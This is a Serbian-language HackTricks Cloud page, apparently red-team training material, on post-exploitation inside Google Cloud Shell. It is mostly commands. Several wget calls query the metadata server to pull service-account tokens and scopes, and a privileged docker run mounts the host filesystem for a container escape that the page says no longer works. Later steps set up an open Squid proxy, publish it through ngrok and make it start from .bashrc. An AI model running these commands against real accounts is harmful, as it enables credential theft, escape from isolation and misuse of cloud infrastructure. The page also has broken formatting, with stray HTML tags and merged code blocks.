GCP - Cloud Shell Post Exploitation
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Cloud Shell
Za više informacija o Cloud Shell pogledajte:
Dobijanje korisničkog tokena iz metapodataka
Samo pristupanjem serveru metapodataka možete dobiti token koji omogućava pristup kao trenutno prijavljeni korisnik:
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
Container Escape / Docker use
Warning
Prethodno je cloud shell radio u kontejneru sa pristupom docker socket-u hosta. Sada je Google promenio arhitekturu i cloud shell kontejner radi u “Docker in a container” podešavanju. Dakle, čak i ako je moguće koristiti docker iz cloud shell-a, nećete moći da pobegnete na host koristeći docker socket. Imajte na umu da je prethodno fajl
docker.sockbio lociran u/google/host/var/run/docker.sock, ali je sada premešten u/run/docker.sock.
Docker use / Old container escape commands
```bash sudo docker -H unix:///run/docker.sock pull alpine:latest sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest sudo docker -H unix:///run/docker.sock start escaper sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh ```Štaviše, ranije je bilo moguće pronaći token za servisni nalog koji koristi cloud shell VM u metadata serveru:
Stari servisni nalog iz metadata servera
```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" default/ vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ ``` Sa sledećim opsegima: ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring.write
</details>
### Koristite ga kao proxy
Ako želite da koristite vašu google cloud shell instancu kao proxy, morate da pokrenete sledeće komande (ili ih ubacite u .bashrc fajl):
<details>
<summary>Instaliraj Squid proxy</summary>
```bash
sudo apt install -y squid
Samo da znaš, Squid je HTTP proxy server. Napravi fajl squid.conf sa sledećim podešavanjima:
Create squid.conf file
```bash http_port 3128 cache_dir /var/cache/squid 100 16 256 acl all src 0.0.0.0/0 http_access allow all ```kopiraj fajl squid.conf u /etc/squid
Kopiraj konfiguraciju u **/etc/squid**
```bash sudo cp squid.conf /etc/squid ```Na kraju pokrenite Squid servis:
Pokrenite Squid servis
```bash sudo service squid start ```Koristite ngrok da bi proxy bio dostupan izvan mreže:
Izložite proxy pomoću ngrok
```bash ./ngrok tcp 3128 ```Nakon pokretanja kopirajte tcp:// URL. Ako želite da pokrenete proxy iz pregledača, preporučuje se da uklonite tcp:// deo i port, i upišete port u polje za port u podešavanjima proxy-ja vašeg pregledača (squid je http proxy server).
Za bolje korišćenje pri pokretanju, fajl .bashrc treba da sadrži sledeće linije:
Dodajte u .bashrc za automatsko pokretanje
```bash sudo apt install -y squid sudo cp squid.conf /etc/squid/ sudo service squid start cd ngrok;./ngrok tcp 3128 ```Instrukcije su kopirane sa https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Proverite tu stranicu za druge lude ideje kako pokrenuti bilo koji softver (baze podataka pa čak i Windows) u Cloud Shell.
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks Cloud

